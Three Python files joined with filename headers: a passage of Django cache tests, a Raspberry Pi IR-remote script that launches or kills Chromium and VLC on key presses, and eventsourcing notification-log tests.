self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# Verify that the querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'beaf87a9a99ee81c673ea2d67ccbec2a.d41d8cd98f00b204e9800998ecf8427e'
)
def test_cache_key_varies_by_url(self):
"""
get_cache_key keys differ by fully-qualified URL instead of path
"""
request1 = self.factory.get(self.path, HTTP_HOST='sub-1.example.com')
learn_cache_key(request1, HttpResponse())
request2 = self.factory.get(self.path, HTTP_HOST='sub-2.example.com')
learn_cache_key(request2, HttpResponse())
self.assertNotEqual(get_cache_key(request1), get_cache_key(request2))
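# Anatomy of the keys asserted above (informational; the format is private
# to django.utils.cache and may change):
#   views.decorators.cache.cache_page.<key_prefix>.<method>.
#       <md5 of the absolute request URL>.<md5 of the learned Vary header values>
# 'd41d8cd98f00b204e9800998ecf8427e' is the MD5 of an empty string, i.e. no
# Vary headers were learned, while the first hash changes with the host,
# path and query string, which is why the two subdomain requests above get
# different keys.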
def test_learn_cache_key(self):
request = self.factory.head(self.path)
response = HttpResponse()
response['Vary'] = 'Pony'
# Make sure that the Vary header is added to the key hash
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_patch_cache_control(self):
tests = (
# Initial Cache-Control, kwargs to patch_cache_control, expected Cache-Control parts
(None, {'private': True}, {'private'}),
('', {'private': True}, {'private'}),
# Test whether private/public attributes are mutually exclusive
('private', {'private': True}, {'private'}),
('private', {'public': True}, {'public'}),
('public', {'public': True}, {'public'}),
('public', {'private': True}, {'private'}),
('must-revalidate,max-age=60,private', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
('must-revalidate,max-age=60,public', {'private': True}, {'must-revalidate', 'max-age=60', 'private'}),
('must-revalidate,max-age=60', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
)
cc_delim_re = re.compile(r'\s*,\s*')
for initial_cc, newheaders, expected_cc in tests:
response = HttpResponse()
if initial_cc is not None:
response['Cache-Control'] = initial_cc
patch_cache_control(response, **newheaders)
parts = set(cc_delim_re.split(response['Cache-Control']))
self.assertEqual(parts, expected_cc)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix',
},
},
)
class PrefixedCacheUtils(CacheUtils):
pass
@override_settings(
CACHE_MIDDLEWARE_SECONDS=60,
CACHE_MIDDLEWARE_KEY_PREFIX='test',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
)
class CacheHEADTest(SimpleTestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_head_caches_correctly(self):
test_content = 'test content'
request = self.factory.head(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
def test_head_with_cached_get(self):
test_content = 'test content'
request = self.factory.get(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
LANGUAGES=[
('en', 'English'),
('es', 'Spanish'),
],
)
class CacheI18nTest(TestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
def check_accept_language_vary(self, accept_language, vary, reference_key):
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_LANGUAGE'] = accept_language
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = vary
key = learn_cache_key(request, response)
key2 = get_cache_key(request)
self.assertEqual(key, reference_key)
self.assertEqual(key2, reference_key)
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation_accept_language(self):
lang = translation.get_language()
self.assertEqual(lang, 'en')
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = 'accept-encoding'
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
self.check_accept_language_vary(
'en-us',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'en-US',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8',
'accept-encoding, accept-language, cookie',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8,ko;q=0.6',
'accept-language, cookie, accept-encoding',
key
)
self.check_accept_language_vary(
'ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 ',
'accept-encoding, cookie, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
'accept-language, accept-encoding, cookie',
key
)
self.check_accept_language_vary(
'ko;q=1.0,en;q=0.5',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'ko, en',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR, en-US',
'accept-encoding, accept-language, cookie',
key
)
@override_settings(USE_I18N=False, USE_L10N=True, USE_TZ=False)
def test_cache_key_i18n_formatting(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when formatting is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_i18n_timezone(self):
request = self.factory.get(self.path)
# This is tightly coupled to the implementation,
# but it's the most straightforward way to test the key.
tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(tz, key, "Cache keys should include the time zone name when time zones are active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False)
def test_cache_key_no_i18n(self):
request = self.factory.get(self.path)
lang = translation.get_language()
tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertNotIn(lang, key, "Cache keys shouldn't include the language name when i18n isn't active")
self.assertNotIn(tz, key, "Cache keys shouldn't include the time zone name when i18n isn't active")
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_with_non_ascii_tzname(self):
# Regression test for #17476
class CustomTzName(timezone.UTC):
name = ''
def tzname(self, dt):
return self.name
request = self.factory.get(self.path)
response = HttpResponse()
with timezone.override(CustomTzName()):
CustomTzName.name = 'Hora estándar de Argentina'.encode('UTF-8') # UTF-8 string
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(
sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active"
)
CustomTzName.name = 'Hora estándar de Argentina' # unicode
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(
sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active"
)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
USE_I18N=True,
)
def test_middleware(self):
def set_cache(request, lang, msg):
translation.activate(lang)
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
# cache with non empty request.GET
request = self.factory.get(self.path, {'foo': 'bar', 'other': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# first access, cache must return None
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Check for cache with QUERY_STRING'
response.content = content
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# cache must return content
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
# different QUERY_STRING, cache must be empty
request = self.factory.get(self.path, {'foo': 'bar', 'somethingelse': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# i18n tests
en_message = "Hello world!"
es_message = "Hola mundo!"
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# Check that we can recover the cache
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, en_message.encode())
# Check that we use etags
self.assertTrue(get_cache_data.has_header('ETag'))
# Check that we can disable etags
with self.settings(USE_ETAGS=False):
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertFalse(get_cache_data.has_header('ETag'))
# change the session language and set content
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'es', es_message)
# change the language again
translation.activate('en')
# retrieve the content from cache
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, en_message.encode())
# change the language again
translation.activate('es')
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, es_message.encode())
# reset the language
translation.deactivate()
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
)
def test_middleware_doesnt_cache_streaming_response(self):
request = self.factory.get(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# This test passes on Python < 3.3 even without the corresponding code
# in UpdateCacheMiddleware, because pickling a StreamingHttpResponse
# fails (http://bugs.python.org/issue14288). LocMemCache silently
# swallows the exception and doesn't store the response in cache.
content = ['Check for cache with streaming content.']
response = StreamingHttpResponse(content)
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix'
},
},
)
class PrefixedCacheI18nTest(CacheI18nTest):
pass
def hello_world_view(request, value):
return HttpResponse('Hello World %s' % value)
def csrf_view(request):
return HttpResponse(csrf(request)['csrf_token'])
@override_settings(
CACHE_MIDDLEWARE_ALIAS='other',
CACHE_MIDDLEWARE_KEY_PREFIX='middlewareprefix',
CACHE_MIDDLEWARE_SECONDS=30,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other',
'TIMEOUT': '1',
},
},
)
class CacheMiddlewareTest(SimpleTestCase):
def setUp(self):
super(CacheMiddlewareTest, self).setUp()
self.factory = RequestFactory()
self.default_cache = caches['default']
self.other_cache = caches['other']
def tearDown(self):
self.default_cache.clear()
self.other_cache.clear()
super(CacheMiddlewareTest, self).tearDown()
def test_constructor(self):
"""
Ensure the constructor correctly distinguishes between CacheMiddleware used
as middleware and CacheMiddleware used as a view decorator, and sets
attributes appropriately.
"""
# If no arguments are passed in construction, it's being used as middleware.
middleware = CacheMiddleware()
# Now test object attributes against values defined in setUp above
self.assertEqual(middleware.cache_timeout, 30)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
# If arguments are being passed in construction, it's being used as a decorator.
# First, test with "defaults":
as_view_decorator = CacheMiddleware(cache_alias=None, key_prefix=None)
self.assertEqual(as_view_decorator.cache_timeout, 30) # Timeout value for 'default' cache, i.e. 30
self.assertEqual(as_view_decorator.key_prefix, '')
# Value of DEFAULT_CACHE_ALIAS from django.core.cache
self.assertEqual(as_view_decorator.cache_alias, 'default')
# Next, test with custom values:
as_view_decorator_with_custom = CacheMiddleware(cache_timeout=60, cache_alias='other', key_prefix='foo')
self.assertEqual(as_view_decorator_with_custom.cache_timeout, 60)
self.assertEqual(as_view_decorator_with_custom.key_prefix, 'foo')
self.assertEqual(as_view_decorator_with_custom.cache_alias, 'other')
def test_middleware(self):
middleware = CacheMiddleware()
prefix_middleware = CacheMiddleware(key_prefix='prefix1')
timeout_middleware = CacheMiddleware(cache_timeout=1)
request = self.factory.get('/view/')
# Put the request through the request middleware
result = middleware.process_request(request)
self.assertIsNone(result)
response = hello_world_view(request, '1')
# Now put the response through the response middleware
response = middleware.process_response(request, response)
# Repeating the request should result in a cache hit
result = middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
# The same request through a different middleware won't hit
result = prefix_middleware.process_request(request)
self.assertIsNone(result)
# The same request with a timeout _will_ hit
result = timeout_middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
def test_view_decorator(self):
# decorate the same view with different cache decorators
default_view = cache_page(3)(hello_world_view)
default_with_prefix_view = cache_page(3, key_prefix='prefix1')(hello_world_view)
explicit_default_view = cache_page(3, cache='default')(hello_world_view)
explicit_default_with_prefix_view = cache_page(3, cache='default', key_prefix='prefix1')(hello_world_view)
other_view = cache_page(1, cache='other')(hello_world_view)
other_with_prefix_view = cache_page(1, cache='other', key_prefix='prefix2')(hello_world_view)
request = self.factory.get('/view/')
# Request the view once
response = default_view(request, '1')
self.assertEqual(response.content, b'Hello World 1')
# Request again -- hit the cache
response = default_view(request, '2')
self.assertEqual(response.content, b'Hello World 1')
# Requesting the same view with the explicit cache should yield the same result
response = explicit_default_view(request, '3')
self.assertEqual(response.content, b'Hello World 1')
# Requesting with a prefix will hit a different cache key
response = explicit_default_with_prefix_view(request, '4')
self.assertEqual(response.content, b'Hello World 4')
# Hitting the same view again gives a cache hit
response = explicit_default_with_prefix_view(request, '5')
self.assertEqual(response.content, b'Hello World 4')
# And going back to the implicit cache will hit the same cache
response = default_with_prefix_view(request, '6')
self.assertEqual(response.content, b'Hello World 4')
# Requesting from an alternate cache won't hit cache
response = other_view(request, '7')
self.assertEqual(response.content, b'Hello World 7')
# But a repeated hit will hit cache
response = other_view(request, '8')
self.assertEqual(response.content, b'Hello World 7')
# And prefixing the alternate cache yields yet another cache entry
response = other_with_prefix_view(request, '9')
self.assertEqual(response.content, b'Hello World 9')
# But if we wait a couple of seconds...
time.sleep(2)
# ... the default cache will still hit
caches['default']
response = default_view(request, '11')
self.assertEqual(response.content, b'Hello World 1')
# ... the default cache with a prefix will still hit
response = default_with_prefix_view(request, '12')
self.assertEqual(response.content, b'Hello World 4')
# ... the explicit default cache will still hit
response = explicit_default_view(request, '13')
self.assertEqual(response.content, b'Hello World 1')
# ... the explicit default cache with a prefix will still hit
response = explicit_default_with_prefix_view(request, '14')
self.assertEqual(response.content, b'Hello World 4')
# .. but a rapidly expiring cache won't hit
response = other_view(request, '15')
self.assertEqual(response.content, b'Hello World 15')
# .. even if it has a prefix
response = other_with_prefix_view(request, '16')
self.assertEqual(response.content, b'Hello World 16')
def test_sensitive_cookie_not_cached(self):
"""
Django must prevent caching of responses that set a user-specific (and
maybe security sensitive) cookie in response to a cookie-less request.
"""
csrf_middleware = CsrfViewMiddleware()
cache_middleware = CacheMiddleware()
request = self.factory.get('/view/')
self.assertIsNone(cache_middleware.process_request(request))
csrf_middleware.process_view(request, csrf_view, (), {})
response = csrf_view(request)
response = csrf_middleware.process_response(request, response)
response = cache_middleware.process_response(request, response)
# Inserting a CSRF cookie in a cookie-less request prevented caching.
self.assertIsNone(cache_middleware.process_request(request))
def test_304_response_has_http_caching_headers_but_not_cached(self):
original_view = mock.Mock(return_value=HttpResponseNotModified())
view = cache_page(2)(original_view)
request = self.factory.get('/view/')
# The view shouldn't be cached on the second call.
view(request).close()
response = view(request)
response.close()
self.assertEqual(original_view.call_count, 2)
self.assertIsInstance(response, HttpResponseNotModified)
self.assertIn('Cache-Control', response)
self.assertIn('Expires', response)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class TestWithTemplateResponse(SimpleTestCase):
"""
Tests various headers with TemplateResponse.
Most are probably redundant since they manipulate the same object
anyway, but the ETag header is 'special' because it relies on the
content being complete (which is not necessarily always the case
with a TemplateResponse).
"""
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
key_prefix = 'localprefix'
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
# Verify that a specified key_prefix is taken into account.
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# Verify that the querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'0f1c2d56633c943073c4569d9a9502fe.d41d8cd98f00b204e9800998ecf8427e'
)
@override_settings(USE_ETAGS=False)
def test_without_etag(self):
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertFalse(response.has_header('ETag'))
@override_settings(USE_ETAGS=True)
def test_with_etag(self):
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertTrue(response.has_header('ETag'))
class TestMakeTemplateFragmentKey(SimpleTestCase):
def test_without_vary_on(self):
key = make_template_fragment_key('a.fragment')
self.assertEqual(key, 'template.cache.a.fragment.d41d8cd98f00b204e9800998ecf8427e')
def test_with_one_vary_on(self):
key = make_template_fragment_key('foo', ['abc'])
self.assertEqual(key, 'template.cache.foo.900150983cd24fb0d6963f7d28e17f72')
def test_with_many_vary_on(self):
key = make_template_fragment_key('bar', ['abc', 'def'])
self.assertEqual(key, 'template.cache.bar.4b35f12ab03cec09beec4c21b2d2fa88')
def test_proper_escaping(self):
key = make_template_fragment_key('spam', ['abc:def%'])
self.assertEqual(key, 'template.cache.spam.f27688177baec990cdf3fbd9d9c3f469')
class CacheHandlerTest(SimpleTestCase):
def test_same_instance(self):
"""
Attempting to retrieve the same alias should yield the same instance.
"""
cache1 = caches['default']
cache2 = caches['default']
self.assertIs(cache1, cache2)
def test_per_thread(self):
"""
Requesting the same alias from separate threads should yield separate
instances.
"""
c = []
def runner():
c.append(caches['default'])
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertIsNot(c[0], c[1])
|
main.py
|
# ---------------------------------------------------------------------#
# Name - IR&NECDataCollect.py
# Description - Reads data from the IR sensor but uses the official NEC Protocol (command line version)
# Author - Lime Parallelogram
# Licence - Attribution Lime
# Date - 06/07/19 - 18/08/19
# ---------------------------------------------------------------------#
# Imports modules
import os
import threading
# ==================#
# Prompts for values
# Input pin
import gpio
PIN_IN = 11
class KeyConfig:
def __init__(self, file_name: str):
self.file_name = file_name
file_out = open(file_name, 'a')
file_out.close()
self.code_to_name = self._read_all()
def write_key(self, key_code, key_name):
output = open(self.file_name, 'a')
output.write("{0}={1}\n".format(key_code, key_name))
output.close()
self.code_to_name[key_code] = key_name
def _read_all(self):
file_in = open(self.file_name, 'r')
lines = file_in.readlines()
hex_keys = {}
for line in lines:
if line.replace(" ", "").__len__() == 0:
continue
keys = line.split("=")
if len(keys) < 2:
continue
hex_keys[keys[0].strip()] = keys[1].strip()
file_in.close()
return hex_keys
def print(self):
config = self.code_to_name
for key in config:
print("key {0} -> {1}".format(key, config[key]))
key_config = KeyConfig("config.cnf")
is_develop = False
if is_develop:
remote = gpio.SimulateIRRemote(port_number=PIN_IN)
else:
remote = gpio.RaspIRRemote(port_number=PIN_IN)
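# Assumed interface of the local `gpio` module, inferred from how `remote`
# is used below (the module itself is not part of this file):
#   waiting_for_key_pressed()            -> blocks, returns the decoded NEC key code
#   start_listen_key_press(on_key_event) -> loops, invoking on_key_event(key_code)
#   release()                            -> frees the GPIO pin on exit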
def training():
while True:
if input("Press enter to start. Type q to quit. ") == 'q':
break
key_hex = remote.waiting_for_key_pressed()
button_name = input("Enter a name for this button: ")
key_config.write_key(key_hex, button_name)
def on_key_event(key_code):
if key_code not in key_config.code_to_name:
print("Key {0} not found".format(key_code))
return
key_name = key_config.code_to_name[key_code]
print("You're press {0} = key {1}".format(key_code, key_name))
event = {
"top": lambda: os.system("nohup /usr/bin/chromium-browser www.google.com >/dev/null &"),
"bottom": lambda: os.system("ps ax | grep chromium-browser | awk '{print $1}' | xargs kill"),
"left": lambda: os.system("nohup vlc /media/pi/MyStorage/Videos/i-bet-you-think-about-me.mp4 >/dev/null &"),
"right": lambda: os.system("ps ax | grep vlc | awk '{print $1}' | xargs kill")
}
if key_name in event:
threading.Thread(target=lambda: event[key_name]()).start()
if __name__ == "__main__":
options = input("Options:\t\n"
"1. Training\n"
"2. Listen\n"
"3. Exit\n"
"4. Show config\n"
"Press here: ")
action = {
"1": lambda: training(),
"2": lambda: remote.start_listen_key_press(on_key_event=on_key_event),
"3": lambda: exit(0),
"4": key_config.print
}
try:
action[options]()
except Exception as e:
print("Error {0}".format(e))
finally:
remote.release()
exit(0)
|
test_notificationlog.py
|
from math import ceil
from threading import Thread
from uuid import uuid4
from eventsourcing.application.notificationlog import (
BigArrayNotificationLog,
NotificationLogReader,
RecordManagerNotificationLog,
)
from eventsourcing.domain.model.events import DomainEvent
from eventsourcing.infrastructure.repositories.array import BigArrayRepository
from eventsourcing.interface.notificationlog import (
NotificationLogView,
RemoteNotificationLog,
)
from eventsourcing.tests.sequenced_item_tests.base import WithEventPersistence
from eventsourcing.tests.sequenced_item_tests.test_cassandra_record_manager import (
WithCassandraRecordManagers,
)
from eventsourcing.tests.sequenced_item_tests.test_django_record_manager import (
DjangoTestCase,
)
from eventsourcing.tests.sequenced_item_tests.test_sqlalchemy_record_manager import (
SQLAlchemyRecordManagerTestCase,
)
from eventsourcing.utils.topic import get_topic
from eventsourcing.utils.transcoding import ObjectJSONEncoder
class NotificationLogTestCase(SQLAlchemyRecordManagerTestCase, WithEventPersistence):
def assert_section(
self,
repo,
requested_id,
expected_id,
expected_len_items,
expected_previous_id,
expected_next_id,
):
section = repo[requested_id]
self.assertEqual(expected_len_items, len(list(section.items)))
self.assertEqual(expected_id, section.section_id)
self.assertEqual(expected_previous_id, section.previous_id)
self.assertEqual(expected_next_id, section.next_id)
def append_notifications(self, *range_args):
for i in range(*range_args):
item = ("item{}".format(i + 1)).encode("utf8")
self.append_notification(item)
def create_notification_log(self, section_size):
return RecordManagerNotificationLog(self.entity_record_manager, section_size)
def construct_entity_record_manager(self):
return self.factory.construct_integer_sequenced_record_manager()
def append_notification(self, item):
sequenced_item = self.entity_record_manager.sequenced_item_class(
uuid4(), 0, get_topic(DomainEvent), item
)
self.entity_record_manager.record_item(sequenced_item)
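# Section IDs used throughout these tests are "<first>,<last>" notification
# number ranges, e.g. "1,5" and "6,10" with section_size=5, and the special
# alias "current" resolves to the section holding the most recent
# notification (see the assertions in TestNotificationLog.test below).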
class TestNotificationLog(NotificationLogTestCase):
def test(self):
# Build notification log.
section_size = 5
notification_log = self.create_notification_log(section_size=section_size)
# Check the sections.
section = notification_log["current"]
self.assertEqual("1,5", section.section_id)
self.assertEqual(0, len(list(section.items)))
self.assertIsNone(section.previous_id)
self.assertIsNone(section.next_id)
# Append notifications.
self.append_notifications(13)
# Check the sections.
self.assert_section(notification_log, "current", "11,15", 3, "6,10", None)
self.assert_section(notification_log, "1,5", "1,5", section_size, None, "6,10")
self.assert_section(
notification_log, "6,10", "6,10", section_size, "1,5", "11,15"
)
self.assert_section(notification_log, "11,15", "11,15", 3, "6,10", None)
self.assert_section(notification_log, "16,20", "16,20", 0, "11,15", None)
self.assert_section(notification_log, "21,25", "21,25", 0, "16,20", None)
# Add some more notifications.
self.append_notifications(13, 24)
# Check the notification log has been extended.
self.assertEqual(len(list(notification_log["11,15"].items)), section_size)
self.assertEqual(len(list(notification_log["16,20"].items)), section_size)
self.assertEqual(len(list(notification_log["21,25"].items)), 4)
self.assertEqual(len(list(notification_log["26,30"].items)), 0)
# Check that a section ID that can't be split by ',' results in a ValueError.
with self.assertRaises(ValueError):
_ = notification_log["invalid"]
class TestBigArrayNotificationLog(TestNotificationLog):
def test(self):
self.section_size = 5
super(TestBigArrayNotificationLog, self).test()
# Check array size must be divisible by section size.
with self.assertRaises(ValueError):
BigArrayNotificationLog(self.big_array, section_size=6)
# # Check the section ID must match the section size.
# notification_log = BigArrayNotificationLog(self.big_array, self.section_size)
# with self.assertRaises(ValueError):
# _ = notification_log['1,2']
# # Check the section ID must be aligned to the array size.
# with self.assertRaises(ValueError):
# _ = notification_log['2,6']
def create_notification_log(self, section_size):
self.big_array = self.create_big_array()
return BigArrayNotificationLog(self.big_array, section_size=section_size)
def create_big_array(self, big_array_id=None):
big_array_id = uuid4() if big_array_id is None else big_array_id
big_array_repo = BigArrayRepository(event_store=self.entity_event_store)
big_array = big_array_repo[big_array_id]
return big_array
def append_notification(self, item):
self.big_array.append(item)
class TestNotificationLogReader(NotificationLogTestCase):
def test(self):
# Build notification log.
section_size = 5
notification_log = self.create_notification_log(section_size=section_size)
# Append 13 notifications.
self.append_notifications(13)
# Construct notification log reader.
reader = NotificationLogReader(notification_log)
# Check position.
self.assertEqual(reader.position, 0)
# Read all notifications.
all_notifications = list(reader)
self.assertEqual(13, len(all_notifications))
# Check position.
self.assertEqual(reader.position, 13)
# Add some more items to the log.
self.append_notifications(13, 21)
# Read subsequent notifications.
subsequent_notifications = list(reader)
self.assertEqual(len(subsequent_notifications), 8)
# Check position.
self.assertEqual(reader.position, 21)
subsequent_notifications = list(reader)
self.assertEqual(len(subsequent_notifications), 0)
# Set position.
reader.seek(13)
subsequent_notifications = list(reader)
self.assertEqual(len(subsequent_notifications), 8)
# Read items after a particular position.
self.assertEqual(len(list(reader[0:])), 21)
self.assertEqual(len(list(reader[1:])), 20)
self.assertEqual(len(list(reader[2:])), 19)
self.assertEqual(len(list(reader[3:])), 18)
self.assertEqual(len(list(reader[13:])), 8)
self.assertEqual(len(list(reader[18:])), 3)
self.assertEqual(len(list(reader[19:])), 2)
self.assertEqual(len(list(reader[20:])), 1)
self.assertEqual(len(list(reader[21:])), 0)
# Check that positions less than 0 cause a ValueError.
with self.assertRaises(ValueError):
reader.position = -1
list(reader)
with self.assertRaises(ValueError):
list(reader.seek(-1))
# Resume from a saved position.
saved_position = 5
advance_by = 3
reader.seek(saved_position)
self.assertEqual(reader.position, saved_position)
reader.list_notifications(advance_by=advance_by)
